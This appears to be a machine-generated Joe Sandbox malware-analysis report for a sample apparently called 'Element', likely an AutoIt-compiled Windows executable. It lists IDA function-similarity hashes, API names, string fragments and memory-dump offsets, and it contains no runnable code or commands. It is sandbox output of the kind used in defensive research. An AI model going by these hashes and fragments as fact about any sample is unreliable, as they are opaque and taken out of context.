                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                    • String ID: CONOUT$
                    • API String ID: 3230265001-3130406586
                    • Opcode ID: de701a4396c4e153d23f8ad3f37449c6d9e79256a48d94d605cba933e1fcaf7d
                    • Instruction ID: 02ba62a5c220de072ad1958942caf09bdff209e5f41fdac6e78299e83b0cff31
                    • Opcode Fuzzy Hash: de701a4396c4e153d23f8ad3f37449c6d9e79256a48d94d605cba933e1fcaf7d
                    • Instruction Fuzzy Hash: 92118231714B8096F7509B62F8783DAA2A4F7A8FE5F444224EE5E87794DF38C4968740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$Create$Show
                    • String ID: AutoIt v3$d$edit
                    • API String ID: 2813641753-2600919596
                    • Opcode ID: 0ad88fc629bd0e984a014ea89d123ec5e352ad141f26ec72c70a003d1c95128a
                    • Instruction ID: e2f017c30877d6f91507745af31dc02d46a31f1f0707ac8c66822f32850df67e
                    • Opcode Fuzzy Hash: 0ad88fc629bd0e984a014ea89d123ec5e352ad141f26ec72c70a003d1c95128a
                    • Instruction Fuzzy Hash: E6212E72A18B8187E750CF14FC8872977A0F788B9AF504239E68D86A56DFBDD548CB40
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 97d8d3606c8b00985874530aa69a2e9c40f0350da9554f7eae706c9fcadbbb71
                    • Instruction ID: e1345bf813b5a51485f89ab0e2b23afe40da3bc07308bd978122d2cc2c831d8e
                    • Opcode Fuzzy Hash: 97d8d3606c8b00985874530aa69a2e9c40f0350da9554f7eae706c9fcadbbb71
                    • Instruction Fuzzy Hash: E9D1ED32619AC596EA60CB15F4A43EAB7E1F7D8784F504535EB8D83B99EE3DC580CB00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Rect$Client$Window$MetricsScreenSystem
                    • String ID:
                    • API String ID: 3220332590-0
                    • Opcode ID: 18d3220a09dc32d3d71dcb14d157741ee50ede115eaee0b264565a3d31b006b7
                    • Instruction ID: 019499fd769e2e8c71e2580a734d6e078cb896148ace056a3fca3a22dda9221a
                    • Opcode Fuzzy Hash: 18d3220a09dc32d3d71dcb14d157741ee50ede115eaee0b264565a3d31b006b7
                    • Instruction Fuzzy Hash: 9DA1D26BA1A2A385E7249F7588047BD33A0FF04F59F145535EE9A8BA94EF3CAC05D310
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: f$p
                    • API String ID: 3215553584-1290815066
                    • Opcode ID: 14ccad43d37fd71aaa8e031f26cd0cf571f1f2d22f7e2fca84e2043b4fd9c4d9
                    • Instruction ID: f0ed0b85d1bca78db11650b41bb97537752c659413e664b6e7aef72b9b2ae17b
                    • Opcode Fuzzy Hash: 14ccad43d37fd71aaa8e031f26cd0cf571f1f2d22f7e2fca84e2043b4fd9c4d9
                    • Instruction Fuzzy Hash: E312C762E0E26386FB20BE54E804279B652FB50F56FD44231D6D987AC8DF3DED809B10
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ByteCharMultiStringWide
                    • String ID:
                    • API String ID: 2829165498-0
                    • Opcode ID: 135b7faccc249d12f88eb3664e1253755368c54c6aec1dafbdc752c20442abd4
                    • Instruction ID: 1b2f41ada88199bfb5ad4e545bb7a388cc4cdb58343f0d5887187d7f25c8a6cf
                    • Opcode Fuzzy Hash: 135b7faccc249d12f88eb3664e1253755368c54c6aec1dafbdc752c20442abd4
                    • Instruction Fuzzy Hash: 4E817B7260178096FB20EF25E4687D9A3A5FBA4BE8F144715EE5987BD8EB38C485C700
                    APIs
                    • #8.OLEAUT32(?,?,?,?,?,?,?,00007FF6C58DB677,?,?,?,?,?,?,00000000,00007FF6C59083FD), ref: 00007FF6C58DB329
                    • #9.WSOCK32(?,?,?,?,?,?,?,00007FF6C58DB677,?,?,?,?,?,?,00000000,00007FF6C59083FD), ref: 00007FF6C58DB3AE
                    • #10.WSOCK32(?,?,?,?,?,?,?,00007FF6C58DB677,?,?,?,?,?,?,00000000,00007FF6C59083FD), ref: 00007FF6C58DB3BA
                    • #9.WSOCK32(?,?,?,?,?,?,?,00007FF6C58DB677,?,?,?,?,?,?,00000000,00007FF6C59083FD), ref: 00007FF6C58DB3C5
                    • #2.WSOCK32(?,?,?,?,?,?,?,00007FF6C58DB677,?,?,?,?,?,?,00000000,00007FF6C59083FD), ref: 00007FF6C58DB3F5
                    • #10.WSOCK32(?,?,?,?,?,?,?,00007FF6C58DB677,?,?,?,?,?,?,00000000,00007FF6C59083FD), ref: 00007FF6C58DB457
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 785b3640f85267f1ef9f05d197945c1451001bbbcd8b86362fb934929ab386fd
                    • Instruction ID: 8ecae36bcecf7f773d8a8f10b31266e4ee799b79363577fd9402e47fb4475505
                    • Opcode Fuzzy Hash: 785b3640f85267f1ef9f05d197945c1451001bbbcd8b86362fb934929ab386fd
                    • Instruction Fuzzy Hash: 6E712D31A1A66382EA28AF25999407C63E1EF45FC3F048137D78E8B795DF2DED518B01
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+$NameName::
                    • String ID:
                    • API String ID: 168861036-0
                    • Opcode ID: 96d98e723097de02a272e54d55b86372c1517beb461cdde51446e9f1e1fea1b6
                    • Instruction ID: a8516e61bbbac749a95356528e696055cf346cf271684e12d9c6d19db4d6639e
                    • Opcode Fuzzy Hash: 96d98e723097de02a272e54d55b86372c1517beb461cdde51446e9f1e1fea1b6
                    • Instruction Fuzzy Hash: 55718872A00B50B9F701EFA4E8B83ED37B5B364794F688016EE0957796DB79C582CB40
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 0-2263619337
                    • Opcode ID: 10a07b77c3d4b654f9d55339737c030c9922b14c4774005ba61325eac3fbb13f
                    • Instruction ID: bbb4c1d877cc4953e20a92acdd27dbad3d36540085154b3fc8903ae1472f22fc
                    • Opcode Fuzzy Hash: 10a07b77c3d4b654f9d55339737c030c9922b14c4774005ba61325eac3fbb13f
                    • Instruction Fuzzy Hash: 34519022F0AA6286EB10DF65D9441BC3365EB84F89F548132DA8D877A5DF3DED01C340
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                    • String ID:
                    • API String ID: 2592858361-0
                    • Opcode ID: c0ed2a69acb1fa65bc09f52d169f3783c288c6979980f6a8e8ea6be4c03c785a
                    • Instruction ID: 68cd6ea29989bd81c1ad0732e472fa244987ee33f15602a98e683a41d2265f36
                    • Opcode Fuzzy Hash: c0ed2a69acb1fa65bc09f52d169f3783c288c6979980f6a8e8ea6be4c03c785a
                    • Instruction Fuzzy Hash: 35518B72B097A286E620CF11D88477937A4FB85F96F104235DA9D87BA2CF7CE805C700
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                    • String ID:
                    • API String ID: 2081738530-0
                    • Opcode ID: e90e3d566dd56e350ca621f805dc626bd08b9bda4c91665b6419e05b97e73a74
                    • Instruction ID: 8f6b29949baab62e02bc1f4bab33821c73952e0000220f080e71b3d7021f2347
                    • Opcode Fuzzy Hash: e90e3d566dd56e350ca621f805dc626bd08b9bda4c91665b6419e05b97e73a74
                    • Instruction Fuzzy Hash: 3F319336A01A40A5FA15EF65E4F83D97765E7B5BA0F180322DE0987799EB78C9C2C310
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                    • String ID:
                    • API String ID: 2081738530-0
                    • Opcode ID: e14cd25dbeedfe3e74d2bb755ee8c59526504ae7ba32fe4ee3ab8448ffde2d5f
                    • Instruction ID: 438379f8817c66a24d4e5870c08a1d01aed3468c9689e1e9e64edc01dc02c90c
                    • Opcode Fuzzy Hash: e14cd25dbeedfe3e74d2bb755ee8c59526504ae7ba32fe4ee3ab8448ffde2d5f
                    • Instruction Fuzzy Hash: DF316135A11A84A1FA15EB55D5783D96365E7B4BA0F084222DE29477D6FE38C9C3C310
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Value$ErrorLast
                    • String ID:
                    • API String ID: 2506987500-0
                    • Opcode ID: c4908968dda7fad744dc83bbee5b7b46b1aa6ac544d159a6541ec4c76f7857dc
                    • Instruction ID: 77b970fcacca1b71b3cda6ba7f46079cd1a1ab46ebd8b82112a48a358666351d
                    • Opcode Fuzzy Hash: c4908968dda7fad744dc83bbee5b7b46b1aa6ac544d159a6541ec4c76f7857dc
                    • Instruction Fuzzy Hash: C81181B830425062FA696775957D3EA66C2AB68BF4F144B259D37077D6EE38C4C3C301
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: From$Prog$ExceptionFreeRaiseStringTasklstrcmpi
                    • String ID:
                    • API String ID: 450394209-0
                    • Opcode ID: c3e3764820b3f5600a73afc0a99e1e7d3feceb6c0e9b2fc54303b0e2514af5be
                    • Instruction ID: 4ee550edbe22294e5799d43fab63eff78621585286e2cf17cb4dc67c9082b113
                    • Opcode Fuzzy Hash: c3e3764820b3f5600a73afc0a99e1e7d3feceb6c0e9b2fc54303b0e2514af5be
                    • Instruction Fuzzy Hash: 60117F32B196928BEB548F12EC4472A63A1AB85F86F584031DB8DCBB19DF3DDC448B00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 2082702847-0
                    • Opcode ID: 14857e1ad4c4825aa7d047bb9807a31f284bfb654c1297a130cb15933308218e
                    • Instruction ID: 7cd04b17c8f27c6d985a62d00b05826a63a3d89e7fb9c4c2a98ede421e8becb0
                    • Opcode Fuzzy Hash: 14857e1ad4c4825aa7d047bb9807a31f284bfb654c1297a130cb15933308218e
                    • Instruction Fuzzy Hash: B0216025A0BB9286FE559F61AC142796290AF84FB6F180735DABD867D6DF3CEC048600
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: CapsDevice$Release
                    • String ID:
                    • API String ID: 1035833867-0
                    • Opcode ID: e96038359b8bcf9d40ab16245d6c00f02c1c42b7617fe174b97500c319439ec5
                    • Instruction ID: 80a141298c4920f78b2a4ca9d3acd0d09614e5f11091a640daf496a52eaa7760
                    • Opcode Fuzzy Hash: e96038359b8bcf9d40ab16245d6c00f02c1c42b7617fe174b97500c319439ec5
                    • Instruction Fuzzy Hash: 09119E35B05B5182EB08CF62AD4802966A1FB88FD2B108079CE8E87B96DF3DD8018740
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID: 'wb$3.ex
                    • API String ID: 0-1480206175
                    • Opcode ID: 1b99198ed72eaa34abd7727ecd78d41af92c6b3f55d7c12e802dc6ce0edaaa08
                    • Instruction ID: 566d18123f7a8df1565e1fd7b4542f2f93e56526e59f3e8568815ea61b9aaf4a
                    • Opcode Fuzzy Hash: 1b99198ed72eaa34abd7727ecd78d41af92c6b3f55d7c12e802dc6ce0edaaa08
                    • Instruction Fuzzy Hash: B5C1E132A0468096FB14CF25E4B43FD67A1F7A5B94F405211EF5A57BAAEF78C981CB00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                    • String ID:
                    • API String ID: 43455801-0
                    • Opcode ID: aa036b7f6b4181bf747b7f25e8c59d16cc241acf913ae98ed06744a76854e657
                    • Instruction ID: ffc74824b87a1ec8fe790f4d5df4f36420b148a043397c7b969efbd91235ac34
                    • Opcode Fuzzy Hash: aa036b7f6b4181bf747b7f25e8c59d16cc241acf913ae98ed06744a76854e657
                    • Instruction Fuzzy Hash: A211BF31B1429282E7148F16BD087696760EB85F96F584170CF8687B53DF7DE858CB80
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: 7b1f2997da372a43bc31476f6d0c07695968ad033343f6aabdfa55d6cba17457
                    • Instruction ID: c5e18425044e429db59a6413293ebf4768cb45b7e980ca0cbcc7df6b5fa9f6c9
                    • Opcode Fuzzy Hash: 7b1f2997da372a43bc31476f6d0c07695968ad033343f6aabdfa55d6cba17457
                    • Instruction Fuzzy Hash: C2111272D16680CAD748CF39DC881293BB2FB58F09B949474C2498B267DF39D49ACB01
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                    • API String ID: 2943138195-757766384
                    • Opcode ID: a9c0f4a58deada827389c446259d37d145cc3e01f8940825d745f2f3ecb991f4
                    • Instruction ID: 704d397afad7e1d779bba41b38a6139d6f161e80e1f2440315d59affa52bfb99
                    • Opcode Fuzzy Hash: a9c0f4a58deada827389c446259d37d145cc3e01f8940825d745f2f3ecb991f4
                    • Instruction Fuzzy Hash: CC717D76601B45B4FB14DF28E8782EC77A9B729784F844526CE4947BA5DB3CC2D2CB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: HandleModulelstrcatlstrcpy
                    • String ID: '#$l
                    • API String ID: 1703669419-2470870263
                    • Opcode ID: 7ab6c8b82b312c050fc5c76860ade17743de0f4200b3867565fef881cdd432d4
                    • Instruction ID: fb9d54293adf4d6ee58af72de7b143d78c80df75dd3000443a38730cb37ed374
                    • Opcode Fuzzy Hash: 7ab6c8b82b312c050fc5c76860ade17743de0f4200b3867565fef881cdd432d4
                    • Instruction Fuzzy Hash: DA51F732715281A6FB65EB15D8387EA77A1F7A4F84F044225DE4A87785FB3CC886C710
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: #$E$O
                    • API String ID: 3215553584-248080428
                    • Opcode ID: 3ec0da66385ca5cfa3e6e9d06278922857a071159ec432c0170ef47ddb72b8c3
                    • Instruction ID: 7f16355bd7e80969399ddd681c72c9aef2c878a6aa7d19f7e4171299e646e0f5
                    • Opcode Fuzzy Hash: 3ec0da66385ca5cfa3e6e9d06278922857a071159ec432c0170ef47ddb72b8c3
                    • Instruction Fuzzy Hash: F6416C22B1AB6195EF518F229C406BD23A4BF54F89F084132EE8D87BD9DF3DE8418300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                    • String ID: bad locale name
                    • API String ID: 2967684691-1405518554
                    • Opcode ID: c0a4caa8a67abd6b4cdbe45affb843424099f781defdef61d71a60ee2b1f111b
                    • Instruction ID: 0b1aa091ac672b0ab752165d987d5ab202494d6e4a6abd96cd30edb1f688dac8
                    • Opcode Fuzzy Hash: c0a4caa8a67abd6b4cdbe45affb843424099f781defdef61d71a60ee2b1f111b
                    • Instruction Fuzzy Hash: EC417D32B06B80A9FB14DFB0D4B43EC33B4EBA0788F0441559E4A67A5AEF34C996D354
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_Stringwcscpy
                    • String ID: Line %d: $AutoIt -
                    • API String ID: 3135491444-4094128768
                    • Opcode ID: 354254922fa2c28dd54db28c89f49ff099e9fde37b9e557e9e980069f242a2a6
                    • Instruction ID: 05b511f3e638d597318a7a4a91be671a68fc52fa30781cae650ac8ca3f6dd831
                    • Opcode Fuzzy Hash: 354254922fa2c28dd54db28c89f49ff099e9fde37b9e557e9e980069f242a2a6
                    • Instruction Fuzzy Hash: 3A415362B0979696EB10EF20DC402B92361FB84B86F800071E5CDC759BDF6CEE09C740
                    APIs
                    Strings
                    Memory Dump Source
